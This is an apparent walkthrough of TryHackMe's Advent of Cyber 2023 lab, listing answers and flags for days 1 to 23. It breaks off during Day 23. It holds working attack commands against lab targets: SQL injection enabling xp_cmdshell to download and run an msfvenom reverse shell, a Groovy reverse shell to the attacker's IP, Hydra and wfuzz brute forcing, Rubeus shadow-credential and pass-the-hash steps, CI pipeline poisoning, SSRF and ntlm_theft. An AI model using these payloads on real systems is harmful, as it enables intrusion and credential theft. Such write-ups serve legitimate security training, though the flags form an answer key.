In this walk through, we will be going through the Advent of Cyber 2023 room from Tryhackme. In this room, we will cover the complete writeup of Advent of Cyber 2023 challenges that covers various beginner friendly challenges ranging from Machine learning to Digital Forensics. So, let’s get started without any delay.
Table of Contents
Task 1 – [Introduction] Welcome to Advent of Cyber 2023!
Question 1 – Read the above and check out the prizes!
Done
Task 2 – [Introduction] Rules and a Short Tutorial
Question 1 – Read the rules!
Done
Task 3 – [Introduction] Follow us on social media!
Task 4 – [Introduction] Join the TryHackMe Community!
Question 1 – Is there a dedicated Advent of Cyber channel on TryHackMe Discord where users can discuss daily challenges and receive dedicated support? (yes/no)
Yes
Task 5 – [Introduction]Subscribing, TryHackMe for Business & Christmas Swag!
Question 1 – Share the annual discount with your friends!
Done
Task 6 – [Introduction] The Insider Threat Who Stole Christmas
Question 1 – Are you ready to help Elf McSkidy tackle Advent of Cyber 2023? Come back on December 1st, 4pm GMT when the first daily challenge will be released!
Done
Task 7 – [Day 1: Machine Learning] Chatbot, tell me, if you’re really safe?
Question 1 – What is McGreedy’s personal email address?
[email protected]
Question 2 – What is the password for the IT server room door?
BtY2S02
Question 3 – What is the name of McGreedy’s secret project?
Purple Snow
Question 4 – If you enjoyed this room, we invite you to join our Discord server for ongoing support, exclusive tips, and a community of peers to enhance your Advent of Cyber experience!
Done
Task 8 – [Day 2: Log Analysis] O Data, All Ye Faithful
Question 1 – Open the notebook “Workbook” located in the directory “4_Capstone” on the VM. Use what you have learned today to analyse the packet capture.
Done
Question 2 – How many packets were captured (looking at the PacketNumber)?
100
Question 3 – What IP address sent the most amount of traffic during the packet capture?
10.10.10.4
Question 4 – What was the most frequent protocol?
ICMP
Question 5 – If you enjoyed today’s task, check out the Intro to Log Analysis room.
Done
Task 9 – [Day 3: Brute Forcing] Hydra is Coming to Town
Question 1 – Using crunch
and hydra
, find the PIN code to access the control system and unlock the door. What is the flag?
crunch 3 3 0123456789ABCDEF -o wordlist.txt
hydra -l '' -P wordlist.txt -f -v 10.10.112.55 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
THM{pin-code-brute-force}
Question 2 – If you have enjoyed this room please check out the Password Attacks room.
Done
Task 10 – [Day 4: Brute Forcing] Baby, it’s CeWLd outside
Question 1 – What is the correct username and password combination? Format username:password
- Generated the password list using cewl.
cewl.rb -d 2 -m 5 -w passwords.txt http://10.10.12.161 --with-numbers
- Generated the usernames list using cewl.
cewl.rb -d 0 -m 5 -w usernames.txt http://10.10.12.161/team.php --lowercase
- Bruteforce the login password using the generated list and wfuzz.
wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.12.161/login.php -d "username=FUZZ&password=FUZ2Z"
isaias:Happiness
Question 2 – What is the flag?
THM{m3rrY4nt4rct1crAft$}
Question 3 – If you enjoyed this task, feel free to check out the Web Enumeration room.
Done
Task 11 – [Day 5: Reverse engineering] A Christmas DOScovery: Tapes of Yule-tide Past
Question 1 – How large (in bytes) is the AC2023.BAK file?
dir
12,704
Question 2 – What is the name of the backup program?
cd Tools/Backup type readme.txt
BackupMaster3000
Question 3 – What should the correct bytes be in the backup’s file signature to restore the backup properly?
EDIT C:\AC2023.BAK
- As per the output of readme.txt above, the first byte of the file signature should be “41 43” which is equivalent to “AC” in ASCII.
41 43
Question 4 – What is the flag after restoring the backup successfully?
BUMASTER.EXE C:\AC2023.BAK
THM{0LD_5CH00L_C00L_d00D}
Question 5 – What you’ve done is a simple form of reverse engineering, but the topic has more than just this. If you are interested in learning more, we recommend checking out our x64 Assembly Crash Course room, which offers a comprehensive guide to reverse engineering at the lowest level.
Done
Task 12 – [Day 6: Memory corruption] Memories of Christmas Past
Question 1 – If the coins variable had the in-memory value in the image below, how many coins would you have in the game?
- Used the below online converter to convert the hex codes to decimal value. Input the hex codes in Little Endian format.
Hexadecimal Convertor – https://www.rapidtables.com/convert/number/hex-to-decimal.html
1397772111
Question 2 – What is the value of the final flag?
THM{mchoneybell_is_the_real_star}
Question 3 – We have only explored the surface of buffer overflows in this task. Buffer overflows are the basis of many public exploits and can even be used to gain complete control of a machine. If you want to explore this subject more in-depth, feel free to check the Buffer Overflows room.
Done
Question 4 – Van Jolly still thinks the Ghost of Christmas Past is in the game. She says she has seen it with her own eyes! She thinks the Ghost is hiding in a glitch, whatever that means. What could she have seen?
Done
Task 13 – [Day 7: Log analysis] ‘Tis the season for log chopping!
Question 1 – How many unique IP addresses are connected to the proxy server?
cut -d ' ' -f2 access.log | sort | uniq
9
Question 2 – How many unique domains were accessed by all workstations?
cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq | nl
111
Question 3 – What status code is generated by the HTTP requests to the least accessed domain?
cut -d ' ' -f3,6 access.log | sort | uniq -c | sort -n
503
Question 4 – Based on the high count of connection attempts, what is the name of the suspicious domain?
cut -d ' ' -f3,6 access.log | sort | uniq -c | sort -nr
frostlings.bigbadstash.thm
Question 5 – What is the source IP of the workstation that accessed the malicious domain?
grep frostlings.bigbadstash.thm access.log | head -n 5
10.10.185.225
Question 6 – How many requests were made on the malicious domain in total?
cut -d ' ' -f3,6 access.log | sort | uniq -c | sort -nr | grep frostlings.bigbadstash.thm
1581
Question 6 – Having retrieved the exfiltrated data, what is the hidden flag?
grep frostlings.bigbadstash.thm access.log | cut -d ' ' -f5 | cut -d '=' -f2 | base64 -d
THM{a_gift_for_you_awesome_analyst!}
Question 7 – If you enjoyed doing log analysis, check out the Log Analysis module in the SOC Level 2 Path.
Done
Task 14 – [Day 8: Disk Forensics] Have a Holly, Jolly Byte!
Question 1 – What is the malware C2 server?
- Looked inside DO NOT OPEN -> secretchat.txt file.
mcgreedysecretc2.thm
Question 2 – What is the file inside the deleted zip archive?
- Looked inside the JuicyTomaTOY.zip directory.
JuicyTomaTOY.exe
Question 4 – What flag is hidden in one of the deleted PNG files?
THM{byt3-L3vel_@n4Lys15}
Question 4 – What is the SHA1 hash of the physical drive and forensic image?
39f2dea6ffb43bf80d80f19d122076b3682773c2
Question 5 – If you liked today’s challenge, the Digital Forensics Case B4DM755 room is an excellent overview of the entire digital forensics and incident response (DFIR) process!
Done
Task 15 – [Day 9: Malware Analysis] She sells C# shells by the C2shore
Question 1 – What HTTP User-Agent was used by the malware for its connection requests to the C2 server?
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
Question 2 – What is the HTTP method used to submit the command execution output?
POST
Question 3 – What key is used by the malware to encrypt or decrypt the C2 data?
youcanthackthissupersecurec2keys
Question 4 – What is the first HTTP URL used by the malware?
http://mcgreedysecretc2.thm/reg
Question 5 – How many seconds is the hardcoded value used by the sleep function?
15
Question 6 – What is the C2 command the attacker uses to execute commands via cmd.exe?
Shell
Question 7 – What is the domain used by the malware to download another binary?
stash.mcgreddy.thm
Question 8 – Check out the Malware Analysis module in the SOC Level 2 Path if you enjoyed analysing malware.
Done
Task 16 – [Day 10: SQL Injection ] Inject the Halls with EXEC Queries
Question 1 – Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?
/giftsearch.php
Question 2 – Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?
http://10.10.88.66/giftresults.php?age=child%27&budget=0
ODBC Driver 17 for SQL Server
Question 3 – Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?
http://10.10.88.66/giftresults.php?age=child' OR 1=1--
THM{a4ffc901c27fb89efe3c31642ece4447}
Question 4 – What flag is in the note file Gr33dstr left behind on the system?
http://10.10.88.66/giftresults.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o reverse.exe
python3 -m http.server
nc -lvnp 4444
http://10.10.88.66/giftresults.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://10.18.1.78:8000/reverse.exe C:\Windows\Temp\reverse.exe'; --
http://10.10.88.66/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe'; --
THM{b06674fedd8dfc28ca75176d3d51409e}
Question 5 – What is the flag you receive on the homepage after restoring the website?
THM{4cbc043631e322450bc55b42c}
Question 6 – If you enjoyed this task, feel free to check out the Software Security module.
Done
Task 17 – [Day 11: Active Directory] Jingle Bells, Shadow Spells
Question 1 – What is the hash of the vulnerable user?
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
.\Whisker.exe add /target:vansprinkles
Rubeus.exe asktgt /user:vansprinkles /certificate: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 /password:"STPvl7jzuCvhljw5" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show
NTLM hash: 03E805D8A8C5AA435FB48832DAD620E3
03E805D8A8C5AA435FB48832DAD620E3
Question 2 – What is the content of flag.txt on the Administrator Desktop?
evil-winrm.rb -i 10.10.225.102 -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3
THM{XMAS_IS_SAFE}
Question 3 – If you enjoyed this task, feel free to check out the Compromising Active Directory module!
Done
Question 4 – Van Sprinkles left some stuff around the DC. It’s like a secret message waiting to be unravelled!
Done
Task 18 – [Day 12: Defence in Depth] Sleighing Threats, One Layer at a Time
Question 1 – What is the default port for Jenkins?
8080
Question 2 – What is the password of the user tracy?
- Used the below groovy reverse shell to get a connection back at my netcat listener.
String host="10.18.1.78"; int port=6996; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
- Looked inside the backup.sh script in /opt/scripts directory and found the tracy’s password.
13_1n_33
Question 3 – What’s the root flag?
- With the found password, switched user to tracy.
su tracy
- Next, checked the sudo permissions for user tracy where we found out that she can run all commands as sudo.
sudo -l
- Switched user to root and captured the root flag.
sudo su
ezRo0tW1thoutDiD
Question 4 – What is the error message when you login as tracy again and try sudo -l
after its removal from the sudoers group?
sudo deluser tracy sudo
Sorry, user tracy may not run sudo on jenkins.
Question 5 – What’s the SSH flag?
cat /etc/ssh/sshd_config
Ne3d2SecureTh1sSecureSh31l
Question 6 – What’s the Jenkins flag?
cat config.xml.bak
FullTrust_has_n0_Place1nS3cur1ty
Question 7 – If you enjoyed this room, please check out our SOC Level 1 learning path.
Done
Task 19 – [Day 13: Intrusion Detection] To the Pots, Through the Walls
Question 1 – Which security model is being used to analyse the breach and defence strategies?
Diamond Model
Question 2 – Which defence capability is used to actively search for signs of malicious activity?
Threat Hunting
Question 3 – What are our main two infrastructure focuses? (Answer format: answer1 and answer2)
Firewalls and Honeypots
Question 4 – Which firewall command is used to block traffic?
deny
Question 5 – There is a flag in one of the stories. Can you find it?
chmod 777 Van_Twinkle_rules.sh cat Van_Twinkle_rules.sh
nano Van_Twinkle_rules.sh
./Van_Twinkle_rules.sh
sudo ufw status verbose
- Accessed the website on port 8090.
- Found the flag in “Santa’s Challenge” post.
THM{P0T$_W@11S_4_S@N7@}
Question 6 – If you enjoyed this task, feel free to check out the Network Device Hardening room.
Done
Task 20 – [Day 14: Machine Learning] The Little Machine That Wanted to Learn
Question 1 – What is the other term given for Artificial Intelligence or the subset of AI meant to teach computers how humans think or nature works?
Machine Learning
Question 2 – What ML structure aims to mimic the process of natural selection and evolution?
Genetic Algorithm
Question 3 – What is the name of the learning style that makes use of labelled data to train an ML structure?
Supervised Learning
Question 4 – What is the name of the layer between the Input and Output layers of a Neural Network?
Hidden Layer
Question 5 – What is the name of the process used to provide feedback to the Neural Network on how close its prediction was?
Back-Propagation
Question 6 – What is the value of the flag you received after achieving more than 90% accuracy on your submitted predictions?
#These are the imports that we need for our Neural Network #Numpy is a powerful array and matrix library used to format our data import numpy as np #Pandas is a machine learning library that also allows for reading and formatting data structures import pandas as pd #This will be used to split our data from sklearn.model_selection import train_test_split #This is used to normalize our data from sklearn.preprocessing import StandardScaler #This is used to encode our text data to integers from sklearn.preprocessing import LabelEncoder #This is our Multi-Layer Perceptron Neural Network from sklearn.neural_network import MLPClassifier #These are the colour labels that we will convert to int colours = ["Red", "Blue", "Green", "Yellow", "Pink", "Purple", "Orange"] #Read the training and testing data files training_data = pd.read_csv("training_dataset.csv") training_data.head() testing_data = pd.read_csv("testing_dataset.csv") testing_data.head() #The Neural Network cannot take Strings as input, therefore we will encode the strings as integers encoder = LabelEncoder() encoder.fit(training_data["Colour Scheme"]) training_data["Colour Scheme"] = encoder.transform(training_data["Colour Scheme"]) testing_data["Colour Scheme"] = encoder.transform(testing_data["Colour Scheme"]) #Read our training data from the CSV file. #First we read the data we will train on X = np.asanyarray(training_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']]) #Now we read the labels of our training data y = np.asanyarray(training_data['Defective'].astype('int')) #Read our testing data test_X = np.asanyarray(testing_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']]) ###### INSERT DATASET SPLIT CODE HERE ###### #Now we need to split our training dataset here train_X, validate_X, train_y, validate_y = train_test_split(X, y, test_size=0.2) print ("Sample of our data:") print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3])) ###### INSERT NORMALISATION CODE HERE ###### #Now we normalize our dataset scaler = StandardScaler() scaler.fit(train_X) train_X = scaler.transform(train_X) validate_X = scaler.transform(validate_X) test_X = scaler.transform(test_X) print ("Sampe of our data after normalization:") print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3])) ##### INSERT CLASSIFIER CODE HERE ###### clf = MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(15, 2), max_iter=10000) print ("Starting to training our Neural Network") ###### INSERT CLASSIFIER TRAINING CODE HERE ###### clf.fit(train_X, train_y) ###### INSERT CLASSIFIER VALIDATION PREDICTION CODE HERE ####### y_predicted = clf.predict(validate_X) #This function tests how well your Neural Network performs with the validation dataset count_correct = 0 count_incorrect = 0 for x in range(len(y_predicted)): if (y_predicted[x] == validate_y[x]): count_correct += 1 else: count_incorrect += 1 print ("Training has been completed, validating neural network now....") print ("Total Correct:\t\t" + str(count_correct)) print ("Total Incorrect:\t" + str(count_incorrect)) accuracy = ((count_correct * 1.0) / (1.0 * (count_correct + count_incorrect))) print ("Network Accuracy:\t" + str(accuracy * 100) + "%") print ("Now we will predict the testing dataset for which we don't have the answers for...") ###### INSERT CLASSIFIER TESTING PREDICTION CODE HERE ###### y_test_predictions = clf.predict(test_X) #This function will save your predictions to a textfile that can be uploaded for scoring print ("Saving predictions to a file") output = open("predictions.txt", 'w') for value in y_test_predictions: output.write(str(value) + "\n") print ("Predictions are saved, this file can now be uploaded to verify your Neural Network") output.close()
python3 detector.py
THM{Neural.Networks.are.Neat!}
Question 7 – If you enjoyed this room, we invite you to join our Discord server for ongoing support, exclusive tips, and a community of peers to enhance your Advent of Cyber experience!
Done
Task 21 – [Day 15: Machine Learning] Jingle Bell SPAM: Machine Learning Saves the Day!
Question 1 – What is the key first step in the Machine Learning pipeline?
Data Collection
Question 2 – Which data preprocessing feature is used to create new features or modify existing ones to improve model performance?
Feature Engineering
Question 3 – During the data splitting step, 20% of the dataset was split for testing. What is the percentage weightage avg of precision of spam detection?
0.98
Question 4 – How many of the test emails are marked as spam?
3
Question 4 – One of the emails that is detected as spam contains a secret code. What is the code?
I_HaTe_BesT_FestiVal
Question 5 – If you enjoyed this room, please check out the Phishing module.
Done
Task 22 – [Day 16: Machine Learning] Can’t CAPTCHA this Machine!
Question 1 – What key process of training a neural network is taken care of by using a CNN?
Feature Extraction
Question 2 – What is the name of the process used in the CNN to extract the features?
Convolution
Question 3 – What is the name of the process used to reduce the features down?
Pooling
Question 4 – What off-the-shelf CNN did we use to train a CAPTCHA-cracking OCR model?
Attention OCR
Question 5 – What is the password that McGreedy set on the HQ Admin portal?
docker run -d -v /tmp/data:/tempdir/ aocr/full docker ps docker exec -it CONTAINER_ID /bin/bash cd /ocr/ curl http://hqadmin.thm:8000/ ls -alh raw_data/dataset/ cat labels/training.txt aocr dataset ./labels/training.txt ./training.tfrecords cd labels && aocr train training.tfrecords cd /ocr/ && cp -r model /tempdir/ docker kill CONTAINER_ID docker run -t --rm -p 8501:8501 -v /tmp/data/model/exported-model:/models/ -e MODEL_NAME=ocr tensorflow/serving python3 bruteforce.py
ReallyNotGonnaGuessThis
Question 6 – What is the value of the flag that you receive when you successfully authenticate to the HQ Admin portal?
THM{Captcha.Can't.Hold.Me.Back}
Question 7 – If you enjoyed this room, check out our Red Teaming learning path!
Done
Task 23 – [Day 17: Traffic Analysis] I Tawt I Taw A C2 Tat!
Question 1 – Which version of SiLK is installed on the VM?
silk_config -v
3.19.1
Question 2 – What is the size of the flows in the count records?
rwfileinfo suspicious-flows.silk
11774
Question 3 – What is the start time (sTime) of the sixth record in the file?
rwcut suspicious-flows.silk --num-recs=6
2023/12/05T09:33:07.755
Question 4 – What is the destination port of the sixth UDP record?
rwfilter suspicious-flows.silk --proto=17 --pass=stdout | rwcut --fields=protocol,sIP,sPort,dIP,dPort --num-recs=6
49950
Question 5 – What is the record value (%) of the dport 53?
rwstats suspicious-flows.silk --fields=dPort --values=records,packets,bytes,sIP-Distinct,dIP-Distinct --count=10
35.33208
Question 6 – What is the number of bytes transmitted by the top talker on the network?
rwstats suspicious-flows.silk --fields=sIP --values=bytes --count=10 --top
735229
Question 7 – What is the sTime value of the first DNS record going to port 53?
rwfilter suspicious-flows.silk --dport=53 --pass=stdout | rwcut --fields=sIP,dIP,stime | head -10
2023/12/08T04:28:44.825
Question 8 – What is the IP address of the host that the C2 potentially controls? (In defanged format: 123[.]456[.]789[.]0 )
rwfilter suspicious-flows.silk --aport=53 --pass=stdout | rwstats --fields=sIP,dIP,dPort --count=10
rwfilter suspicious-flows.silk --any-address=175.175.173.221 --pass=stdout | rwstats --fields=sIP,dIP --count=10
175[.]175[.]173[.]221
Question 9 – Which IP address is suspected to be the flood attacker? (In defanged format: 123[.]456[.]789[.]0 )
rwfilter suspicious-flows.silk --aport=80 --pass=stdout | rwstats --fields=sIP,dIP,dPort --count=10
175[.]215[.]236[.]223
Question 10 – What is the sent SYN packet’s number of records?
rwfilter suspicious-flows.silk --any-address=175.215.236.223 --pass=stdout | rwstats --fields=sIP,dIP --count=10
1658
Question 11 – We’ve successfully analysed network flows to gain quick statistics. If you want to delve deeper into network packets and network data, you can look at the Network Security and Traffic Analysis module.
Done
Task 24 – [Day 18: Eradication] A Gift That Keeps on Giving
Question 1 – What is the name of the service that respawns the process after killing it?
top
systemctl list-unit-files | grep enabled
a-unkillable.service
Question 2 – What is the path from where the process and service were running?
cd /proc/[whatever PID a process is running] sudo ls -la exe
/etc/systemd/system/a
Question 3 – The malware prints a taunting message. When is the message shown? Choose from the options below.
- Randomly
- After a set interval
- On process termination
- None of the above
4
Question 4 – If you enjoyed this task, feel free to check out the Linux Forensics room.
Done
Task 25 – [Day 19: Memory Forensics] CrypTOYminers Sing Volala-lala-latility
Question 1 – What is the exposed password that we find from the bash history output?
cp Ubuntu_5.4.0-163-generic_profile.zip ~/.local/lib/python2.7/site-packages/volatility/plugins/overlays/linux vol.py --info | grep Ubuntu
vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_bash
NEhX4VSrN7sV
Question 2 – What is the PID of the miner process that we find?
vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_pslist
10280
Question 3 – What is the MD5 hash of the miner process?
mkdir extracted vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_procdump -D extracted -p 10280
ls extracted/ md5sum extracted/miner.10280.0x400000
153a5c8efe4aa3be240e5dc645480dee
Question 4 – What is the MD5 hash of the mysqlserver process?
vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_procdump -D extracted -p 10280 md5sum extracted/mysqlserver.10291.0x400000
c586e774bb2aa17819d7faae18dad7d1
Question 5 – Use the command strings extracted/miner.<PID from question 2>.0x400000 | grep http://
. What is the suspicious URL? (Fully defang the URL using CyberChef)
strings extracted/miner.10280.0x400000 | grep http://
hxxp[://]mcgreedysecretc2[.]thm
Question 6 – After reading the elfie file, what location is the mysqlserver process dropped in on the file system?
vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_find_file -i 0xffff9ce9b78280e8 -O extracted/elfie ls extracted/ cat extracted/elfie
/var/tmp/.system-python3.8-Updates/mysqlserver
Question 7 – If you enjoyed this task, feel free to check out the Volatility room.
Done
Task 26 – [Day 20: DevSecOps] Advent of Frostlings
Question 1 – What is the handle of the developer responsible for the merge changes?
BadSecOps
Question 2 – What port is the defaced calendar site server running on?
9081
Question 3 – What server is the malicious server running on?
Apache
Question 4 – What message did the Frostlings leave on the defaced site?
Frostlings Rules
Question 5 – What is the commit ID of the original code for the Advent Calendar site?
986b7407
Question 6 – If you enjoyed today’s challenge, please check out the Source Code Security room.
Done
Question 7 – Detective Frosteau believes it was an account takeover based on the activity. However, Tracy might have left some crumbs.
Done
Task 27 – [Day 21: DevSecOps] Yule be Poisoned: A Pipeline of Insecure Code!
Question 1 – What Linux kernel version is the Jenkins node?
git clone http://10.10.63.26:3000/McHoneyBell/gift-wrapper-pipeline.git
pipeline { agent any stages { stage('Prepare') { steps { git 'http://127.0.0.1:3000/McHoneyBell/gift-wrapper.git' } } stage('Build') { steps { sh 'uname -a' } } } }
git add . git commit -m "Test" git push
git clone http://10.10.63.26:3000/McHoneyBell/gift-wrapper.git cat Makerfile cat to_pip.sh
nano Makerfile
git add . git commit -m "Kernel" git push
5.4.0-1029-aws
Question 2 – What value is found from /var/lib/jenkins/secret.key?
nano Makerfile
git add . git commit -m "Secret" git push
90e748eafdd2af4746a5ef7941e63272f24f1e33a2882f614ebfa6742e772ba7
Question 3 – Visit our Discord!
Done
Task 28 – [Day 22: SSRF] Jingle Your SSRF Bells: A Merry Command & Control Hackventure
Question 1 – Is SSRF the process in which the attacker tricks the server into loading only external resources (yea/nay)?
nay
Question 2 – What is the C2 version?
http://mcgreedysecretc2.thm/getClientData.php?url=file:////var/www/html/config.php
mcgreedy: mcgreedy!@#$%
1.1
Question 3 – What is the username for accessing the C2 panel?
McGreedy
Question 4 – What is the flag value after accessing the C2 panel?
THM{EXPLOITED_31001}
Question 5 – What is the flag value after stopping the data exfiltration from the McSkidy computer?
THM{AGENT_REMOVED_1001}
Question 6 – If you enjoyed this task, feel free to check out the SSRF room.
Done
Task 29 – [Day 23: Coerced Authentication] Relay All the Way
Question 1 – What is the name of the AD authentication protocol that makes use of tickets?
Kerberos
Question 2 – What is the name of the AD authentication protocol that makes use of the NTLM hash?
NetNTLM
Question 3 – What is the name of the tool that can intercept these authentication challenges?
Responder
Question 4 – What is the password that McGreedy set for the Administrator account?
cd /root/Rooms/AoC2023/Day23/ntlm_theft/ python3 ntlm_theft.py -g lnk -s 10.10.95.108 -f stealthy
